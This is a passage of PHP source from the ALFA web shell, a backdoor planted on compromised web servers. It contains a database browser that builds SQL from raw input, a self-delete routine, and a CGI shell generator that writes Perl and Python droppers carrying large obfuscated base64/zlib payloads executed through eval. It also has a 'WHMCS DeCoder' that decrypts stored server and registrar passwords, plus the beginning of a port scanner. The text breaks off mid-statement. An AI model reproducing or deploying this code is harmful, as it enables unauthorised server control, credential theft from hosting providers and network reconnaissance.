\\n\\t(\".implode(\", \", $item).')';\n\t\t\t\t\t\t\t$head = false;\n\t\t\t\t\t\t\t} else\n\t\t\t\t\t\t\t$sql = \"\\n\\t,(\".implode(\", \", $item).')';\n\t\t\t\t\t\t\tif($fp) fwrite($fp, $sql); else echo($sql);\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif(!$head)\n\t\t\t\t\t\t\tif($fp) fwrite($fp, \";\\n\\n\"); else echo(\";\\n\\n\");\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\techo @json_encode(array(\"status\" => true, \"file\" => $db[\"dump_file\"]));\n\t\t\t}\n\t\t}elseif($type == \"load_tables\"){\n\t\t\t$tables = array();\n\t\t\t$q_tables = @mysqli_query($conn, \"SHOW TABLES;\");\n\t\t\t$count = 0;\n\t\t\twhile($row = @mysqli_fetch_array($q_tables)){\n\t\t\t\tif($sql_count){\n\t\t\t\t\t$count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');\n\t\t\t\t\tif($count_q){\n\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\n\t\t\t\t\t\t$count = $count[0];\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$tables[] = array(\"name\" => $row[0], \"count\" => (int)$count);\n\t\t\t}\n\t\t\techo @json_encode($tables);\n\t\t}elseif($type == \"alter\"){\n\t\t\t$db[\"alter\"][\"type\"] = strtolower($db[\"alter\"][\"type\"]);\n\t\t\t$inputs = $db[\"alter\"][\"type\"].\"(\".$db[\"alter\"][\"input\"].\")\";\n\t\t\t$text_input = array(\"longtext\", \"text\", \"mediumtext\", \"tinytext\");\n\t\t\tif(in_array($db[\"alter\"][\"type\"], $text_input)){\n\t\t\t\t$inputs = $db[\"alter\"][\"type\"];\n\t\t\t}\n\t\t\t@mysqli_query($conn, \"ALTER TABLE `\".$db[\"table\"].\"` MODIFY COLUMN `\".$db[\"column\"].\"` \" . $inputs);\n\t\t\t$error = @mysqli_error($conn);\n\t\t\tif($error){\n\t\t\t\techo $error;\n\t\t\t}else{\n\t\t\t\techo \"ok\";\n\t\t\t}\n\t\t}elseif($type == \"edit\" || $type == \"delete\" || $type == \"delete_all\"){\n\t\t\tif($type == \"edit\"){\n\t\t\t\t$q = @mysqli_query($conn, \"SELECT * FROM `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` WHERE `\".$db[\"col_key\"].\"` = '\".addslashes($db[\"key\"]).\"' LIMIT 0,1\");\n\t\t\t\t$row = @mysqli_fetch_assoc($q);\n\t\t\t\tif($row){\n\t\t\t\t\t$columns_query = @mysqli_query($conn, \"SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '\".$db[\"db\"].\"' AND `TABLE_NAME` = '\".$db[\"table\"].\"'\");\n\t\t\t\t\t$columns = array();\n\t\t\t\t\t$edit_data = array();\n\t\t\t\t\twhile($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\n\t\t\t\t\t\t$input = array(\"col_type\" => $row2[\"COLUMN_TYPE\"]);\n\t\t\t\t\t\t$row2[\"type\"] = strtolower($row2[\"type\"]);\n\t\t\t\t\t\tswitch($row2[\"type\"]){\n\t\t\t\t\t\t\tcase \"longtext\": case \"text\": case \"mediumtext\": case \"tinytext\":\n\t\t\t\t\t\t\t\t$input[\"tag\"] = \"textarea\";\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase \"int\": case \"smallint\": case \"bigint\": case \"tinyint\": case \"mediumint\":\n\t\t\t\t\t\t\t\t$input[\"tag\"] = \"input\";\n\t\t\t\t\t\t\t\t$input[\"type\"] = \"number\";\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\t$input[\"tag\"] = \"input\";\n\t\t\t\t\t\t\t\t$input[\"type\"] = \"text\";\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$columns[$row2[\"name\"]] = $input;\n\t\t\t\t\t}\n\t\t\t\t\tforeach($row as $key => $v){\n\t\t\t\t\t\t$edit_data[] = array(\"col\" => $key, \"value\" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), \"type\" => $columns[$key]);\n\t\t\t\t\t}\n\t\t\t\t\techo @json_encode($edit_data);\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\tif($type == \"delete_all\"){\n\t\t\t\t\t$rows = implode(\"', '\", $db[\"rows\"]);\n\t\t\t\t}else{\n\t\t\t\t\t$rows = addslashes($db[\"key\"]);\n\t\t\t\t}\n\t\t\t\t$query = \"DELETE FROM `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` WHERE `\".$db[\"col_key\"].\"` IN ('\".$rows.\"')\";\n\t\t\t\t@mysqli_query($conn, $query);\n\t\t\t\t$error = @mysqli_error($conn);\n\t\t\t\tif($error){\n\t\t\t\t \t$status = false;\n\t\t\t\t}else{\n\t\t\t\t \t$status = true;\n\t\t\t\t}\n\t\t\t\techo @json_encode(array(\"status\" => $status, \"error\" => $error, \"query\" => $query));\n\t\t\t}\n\t\t}elseif($type == \"update\"){\n\t\t\t$query = \"UPDATE `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` SET \";\n\t\t\tforeach($db[\"data\"] as $col => $val){\n\t\t\t\t$query .= \"`\".$col.\"` = '\".mysqli_real_escape_string($conn, $val).\"',\";\n\t\t\t}\n\t\t\t$query = substr($query, 0, -1);\n\t\t    $query .= \"WHERE `\".$db[\"col_key\"].\"` = '\".$db[\"key\"].\"'\";\n\t\t\t$res = @mysqli_query($conn, $query);\n\t\t\techo @json_encode(array(\"status\" => $res, \"error\" => @mysqli_error($conn)));\n\t\t}elseif($type == \"insert\"){\n\t\t\t$query = \"INSERT INTO `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` \";\n\t\t\tforeach($db[\"data\"] as $col => $val){\n\t\t\t\t$cols .= $col . \",\";\n\t\t\t\t$vals .= \"'\".mysqli_real_escape_string($conn, $val).\"',\";\n\t\t\t}\n\t\t\t$cols = substr($cols, 0, -1);\n\t\t\t$vals = substr($vals, 0, -1);\n\t\t\t$query = $query . \"(\" . $cols . \")\" . \"VALUES(\" . $vals . \")\";\n\t\t\t$res = @mysqli_query($conn, $query);\n\t\t\techo @json_encode(array(\"status\" => $res, \"error\" => @mysqli_error($conn)));\n\t\t}else{\n\t\t\t$pages = 0;\n\t\t\t$title = false;\n\t\t\t$query = \"\";\n\t\t\t$tbl_content = '';\n\t\t\t$line = 0;\n\t\t\t$tables = array();\n\t\t\t$columns = array();\n\t\t\tif($type == \"load_data\"){\n\t\t\t\t$query = \"SELECT * FROM `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` LIMIT 0,30\";\n\t\t\t\t$tbl_count_q = @mysqli_query($conn, \"SELECT COUNT(*) FROM `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"`\");\n\t\t\t\t$tbl_count = @mysqli_fetch_row($tbl_count_q);\n\t\t\t\t$columns_query = @mysqli_query($conn, \"SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '\".$db[\"db\"].\"' AND `TABLE_NAME` = '\".$db[\"table\"].\"'\");\n\t\t\t\twhile($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\n\t\t\t\t\t$columns[] = $row2;\n\t\t\t\t}\n\t\t\t\tif($tbl_count[0] > 30){\n\t\t\t\t\t$pages = ceil($tbl_count[0] / 30);\n\t\t\t\t}\n\t\t\t}elseif($type == \"query\"){\n\t\t\t\t$query = $db[\"query\"];\n\t\t\t}elseif($type == \"page\"){\n\t\t\t\t$db[\"page\"] = (int)$db[\"page\"] - 1;\n\t\t\t\t$query = \"SELECT * FROM `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` LIMIT \".($db[\"page\"]*30).\",30\";\n\t\t\t}elseif($type == \"search\"){\n\t\t\t\t$search = \"\";\n\t\t\t\t$search_noval = array(\"= ''\", \"!= ''\", \"IS NULL\", \"IS NOT NULL\");\n\t\t\t\tforeach($db[\"search\"] as $col => $val){\n\t\t\t\t\t$search_noval_r = in_array($val[\"opt\"], $search_noval);\n\t\t\t\t\tif(empty($val[\"value\"]) && !$search_noval_r)continue;\n\t\t\t\t\tif(strstr($val[\"opt\"], \"...\") || $search_noval_r){\n\t\t\t\t\t\t$val[\"opt\"] = str_replace(\"...\", $val[\"value\"], $val[\"opt\"]);\n\t\t\t\t\t\t$search .= $col . \" \" . $val[\"opt\"] . \" AND \";\n\t\t\t\t\t}else{\n\t\t\t\t\t\t$search .= $col . \" \" . $val[\"opt\"] . \" '\".addslashes($val[\"value\"]).\"' AND \";\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$search .= \"1=1\";\n\t\t\t\t$query = \"SELECT * FROM `\".$db[\"db\"].\"`.`\".$db[\"table\"].\"` WHERE \" . $search;\n\t\t\t}\n\t\t\t$q_tables = @mysqli_query($conn, $query);\n\t\t\tif(!$q_tables){\n\t\t\t\techo @json_encode(array(\"status\" => false, \"error\" => @mysqli_error($conn), \"query\" => $query));\n\t\t\t\treturn false;\n\t\t\t}\n\t\t\t$col_key = @mysqli_query($conn, \"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '\".@addslashes($db[\"db\"]).\"' AND TABLE_NAME = '\".@addslashes($db[\"table\"]).\"' AND COLUMN_KEY = 'PRI'\");\n\t\t\tif($col_key){\n\t\t\t\t$col_key = @mysqli_fetch_row($col_key);\n\t\t\t\t$col_key = $col_key[0];\n\t\t\t\tif(!empty($col_key)){\n\t\t\t\t\t$tbl_content = '
';\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\t$col_key = false;\n\t\t\t}\n\t\t\twhile($item = @mysqli_fetch_assoc($q_tables)){\n\t\t\t\tif(!$title){\n\t\t\t\t\t$tbl_content .= '';\n\t\t\t\t\tif($col_key){\n\t\t\t\t\t\t$tbl_content .= '';\n\t\t\t\t\t}\n\t\t\t\t\tforeach($item as $key => $value){\n\t\t\t\t\t\t$tbl_content .= '';\n\t\t\t\t\t}\n\t\t\t\t\treset($item);\n\t\t\t\t\t$title=true;\n\t\t\t\t\t$tbl_content .= '';\n\t\t\t\t}\n\n\t\t\t\tif($col_key){\n\t\t\t\t\t$cacheMsg = '';\n\t\t\t\t}\n\t\t\t\t$tbl_content .= ''.$cacheMsg;\n\t\t\t\t$line++;\n\t\t\t\tforeach($item as $key => $value){\n\t\t\t\t\tif($value == null){\n\t\t\t\t\t\t$tbl_content .= '';\n\t\t\t\t\t}else{\n\t\t\t\t\t\t$tbl_content .= '';\n\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$tbl_content .= '';\n\t\t\t}\n\t\t\t$tbl_content .= '
EditDelete'.$key.'
EditDelete
null'.nl2br(htmlspecialchars($value)).'
';\n\t\t\tif(!$title){\n\t\t\t\t$tbl_content = \"
Table is empty...
\";\n\t\t\t}\n\t\t\techo @json_encode(array(\"status\" => true, \"table\" => $tbl_content, \"columns\" => $columns, \"pages\" => $pages, \"query\" => $query));\n\t\t}\n\t\t@mysqli_close($conn);\n\t}\n}\nfunction alfaselfrm(){\nif(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){\necho(__pre().'
');\nif(@unlink($GLOBALS['__file_path'])){\necho('Shell has been removed :)');\n}else{\necho 'unlink error!';\n}\necho('
');\n}\nif(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){\necho \"
\";\necho \"\n
\";\necho '
Do you want to destroy me?!
 Yes';\necho '
';\n}\n}\nfunction alfacgishell(){\nalfahead();\n$div = \"\";\nalfaCreateParentFolder();\n@chdir($GLOBALS['home_cwd'] . \"/\" . __ALFA_DATA_FOLDER__);\nif(!in_array($_POST['alfa1'],array('perl','py'))){\n$div = \"
\";\necho '
| CGI Shell |
| Perl | | Python | ';\n}\nif(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){\n@mkdir('cgialfa',0755);\n@chdir('cgialfa');\nalfacgihtaccess('cgi');\n$name = $_POST['alfa1'].'.alfa';\n$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'.\"\\n\".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));';;\n$py = '#!/usr/bin/python'.\"\\nimport zlib, base64\\n\".'eval(compile(zlib.decompress(base64.b64decode(\"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\")),\\'\\',\\'exec\\'))';\nif($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}\nif(__write_file($name,$code)){\n@chmod($name,0755);\necho '';\n}\n}\necho $div;\nalfafooter();\n}\nfunction alfaWhmcs(){\nalfahead();\necho '
';\nfunction decrypt($string,$cc_encryption_hash){\n$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\n$hash_key = _hash($key);\n$hash_length = strlen ($hash_key);\n$string = __ZGVjb2Rlcg($string);\n$tmp_iv = substr ($string, 0, $hash_length);\n$string = substr ($string, $hash_length, strlen ($string) - $hash_length);\n$iv = $out = '';\n$c = 0;\nwhile ($c < $hash_length)\n{\n$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\n++$c;\n}\n$key = $iv;\n$c = 0;\nwhile ($c < strlen ($string))\n{\nif (($c != 0 AND $c % $hash_length == 0))\n{\n$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\n}\n$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\n++$c;\n}\nreturn $out;\n}\nfunction _hash($string)\n{\nif(function_exists('sha1'))\n{\n$hash = sha1 ($string);\n}\nelse\n{\n$hash = md5 ($string);\n}\n$out = '';\n$c = 0;\nwhile ($c < strlen ($hash))\n{\n$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\n$c += 2;\n}\nreturn $out;\n}\nAlfaNum(8,9,10);\necho \"

| WHMCS DeCoder |
\".getConfigHtml('whmcs').\"
\n\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')\n);\ncreate_table($table);\necho \"
\";\nif($_POST['alfa5']!=''){\n$db_host=($_POST['alfa7']);\n$db_username=($_POST['alfa3']);\n$db_password=($_POST['alfa4']);\n$db_name=($_POST['alfa5']);\n$cc_encryption_hash=($_POST['alfa6']);\necho __pre();\n$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));\n$query = mysqli_query($conn,\"SELECT * FROM tblservers\");\n$num = mysqli_num_rows($query);\nif ($num > 0){\nfor($i=0; $i <=$num-1; $i++){\n$v = @mysqli_fetch_array($query);\n$ipaddress = $v['ipaddress'];\n$username = $v['username'];\n$type = $v['type'];\n$active = $v['active'];\n$hostname = $v['hostname'];\necho(\"
\");\n$password = decrypt ($v['password'], $cc_encryption_hash);\necho(\"\");\necho(\"\");\necho(\"\");\necho(\"\");\necho(\"\");\necho(\"\");\necho \"
Type$type
Active$active
Hostname$hostname
Ip$ipaddress
Username$username
Password$password


\";\n}\n$query1 = @mysqli_query($conn,\"SELECT * FROM tblregistrars\");\n$num1 = @mysqli_num_rows($query1);\nif ($num1 > 0){\nfor($i=0; $i <=$num1 -1; $i++){\n$v = mysqli_fetch_array($query1);\n$registrar = $v['registrar'];\n$setting = $v['setting'];\n$value = decrypt($v['value'], $cc_encryption_hash);\nif ($value==\"\"){\n$value=0;\n}\necho(\"
Domain Reseller 
\");\necho(\"
\");\necho(\"\");\necho(\"\");\necho(\"\");\necho \"
Register$registrar
Setting$setting
Value$value


\";\n}\n}\n}else{__alert('tblservers is Empty...!');};\n}\necho \"
\";\nalfafooter();\n}\nfunction alfaportscanner(){\nalfahead();\necho '
| Port Scaner |
\n
\n\n
Host: 
 \n
Port start: 
 \n
Port end: 
  \n

';\n$start = strip_tags($_POST['alfa2']);\n$end = strip_tags($_POST['alfa3']);\n$host = strip_tags($_POST['alfa4']);\nif(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){\necho __pre();\n$packetContent = \"GET / HTTP/1.1\\r\\n\\r\\n\";\nif(ctype_xdigit($packetContent))$packetContent = @pack(\"H*\" , $packetContent);\nelse{\n$packetContent = str_replace(array(\"\\r\",\"\\n\"), \"\", $packetContent);\n$packetContent = str_replace(array(\"\\\\r\",\"\\\\n\"), array(\"\\r\", \"\\n\"), $packetContent);\n}\nfor($i = $start; $i<=$end; $i++){\n$sock = @fsockopen($host, $i, $errno, $errstr, 3);\nif($sock){\nstream_set_timeout($sock, 5);\nfwrite($sock, $packetContent.\"\\r\\n\\r\\n\\x00\");\n$counter = 0;\n$maxtry = 